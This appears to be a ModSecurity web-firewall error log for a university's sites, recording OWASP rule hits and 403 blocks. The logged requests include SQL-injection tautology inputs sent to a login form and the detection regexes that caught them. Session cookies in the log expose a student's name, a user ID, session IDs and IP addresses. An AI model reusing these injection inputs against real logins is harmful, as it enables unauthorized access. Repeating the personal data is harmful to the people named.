[Mon Aug 28 18:08:12.198893 2023] [:error] [pid 49258] [client 103.119.98.179] ModSecurity: Rule 7fe1c6e3f5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/-"] [unique_id "ZOyAHMCo-f0AAMBqw6gAAAAH"]
[Mon Aug 28 19:21:16.066689 2023] [:error] [pid 50569] [client 60.253.107.226] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_library/jnsbuku_form.js"] [unique_id "ZOyRPMCo-f0AAMWJ4JIAAAAS"]
[Mon Aug 28 19:21:16.066690 2023] [:error] [pid 50566] [client 60.253.107.226] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_library/opac_form.js"] [unique_id "ZOyRPMCo-f0AAMWGa1kAAAAL"]
[Mon Aug 28 19:21:16.066744 2023] [:error] [pid 50492] [client 116.68.168.26] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/dashboard/dashboard_rektor.js"] [unique_id "ZOyRPMCo-f0AAMU8IIoAAAAN"]
[Mon Aug 28 19:21:16.079448 2023] [:error] [pid 50560] [client 60.253.107.226] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "40.77.167.63_bba275c17a45b4645f097ed00f67970e62d5eca4"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/e_library/jnsbuku.js"] [unique_id "ZOyRPMCo-f0AAMWA18UAAAAO"]
[Mon Aug 28 19:30:44.208161 2023] [:error] [pid 50787] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyTdMCo-f0AAMZjgGkAAAAG"]
[Mon Aug 28 19:31:40.521397 2023] [:error] [pid 50785] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/kelas/data"] [unique_id "ZOyTrMCo-f0AAMZhcZwAAAAR"]
[Mon Aug 28 19:34:20.989016 2023] [:error] [pid 50801] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyUTMCo-f0AAMZxzREAAAAT"]
[Mon Aug 28 19:35:24.407610 2023] [:error] [pid 50849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyUjMCo-f0AAMahrNUAAAAX"]
[Mon Aug 28 19:37:52.998416 2023] [:error] [pid 50782] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyVIMCo-f0AAMZeKogAAAAK"]
[Mon Aug 28 19:38:04.655652 2023] [:error] [pid 50784] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyVLMCo-f0AAMZg4QEAAAAQ"]
[Mon Aug 28 19:46:31.457328 2023] [:error] [pid 50978] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyXJ8Co-f0AAMciLIAAAAAO"]
[Mon Aug 28 19:47:36.959205 2023] [:error] [pid 50860] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:columns[0][data]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:columns[0][data]: columns[0][data]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "tpa-online.unla.ac.id"] [uri "/jurusan/data"] [unique_id "ZOyXaMCo-f0AAMasAFMAAAAM"]
[Mon Aug 28 20:15:11.932935 2023] [:error] [pid 51585] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: ' 1=1 found within ARGS:password: 0' 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "tpa-online.unla.ac.id"] [uri "/auth/cek_login"] [unique_id "ZOyd38Co-f0AAMmBgSAAAAAB"]
[Mon Aug 28 20:19:20.568797 2023] [:error] [pid 51617] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0=0 found within ARGS:password: 0=0 \\x22 1=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "tpa-online.unla.ac.id"] [uri "/auth/cek_login"] [unique_id "ZOye2MCo-f0AAMmhAeIAAAAO"]
[Mon Aug 28 20:20:02.348973 2023] [:error] [pid 51655] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search[value]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search[value]: 0\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "tpa-online.unla.ac.id"] [uri "/kelas/data"] [unique_id "ZOyfAsCo-f0AAMnHBb8AAAAL"]
[Mon Aug 28 23:54:44.501903 2023] [:error] [pid 55743] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOzRVMCo-f0AANm-L18AAAAC"]
[Mon Aug 28 23:54:45.746903 2023] [:error] [pid 55743] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRVcCo-f0AANm-L2AAAAAC"]
[Mon Aug 28 23:54:46.312141 2023] [:error] [pid 55748] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22d27e650aaefb4b1f8d561ff138450841\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241624\\x22;}32ddf272f44aead720f0d6d1f8b1ec86"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOzRVsCo-f0AANnEOjMAAAAB"]
[Mon Aug 28 23:54:52.643362 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRXMCo-f0AANnDyPAAAAAD"]
[Mon Aug 28 23:54:53.130216 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRXcCo-f0AANnDyPEAAAAD"]
[Mon Aug 28 23:54:54.866612 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRXsCo-f0AANnDyPIAAAAD"]
[Mon Aug 28 23:54:54.993281 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRXsCo-f0AANnDyPMAAAAD"]
[Mon Aug 28 23:54:56.530383 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRYMCo-f0AANnDyPQAAAAD"]
[Mon Aug 28 23:54:56.654387 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRYMCo-f0AANnDyPUAAAAD"]
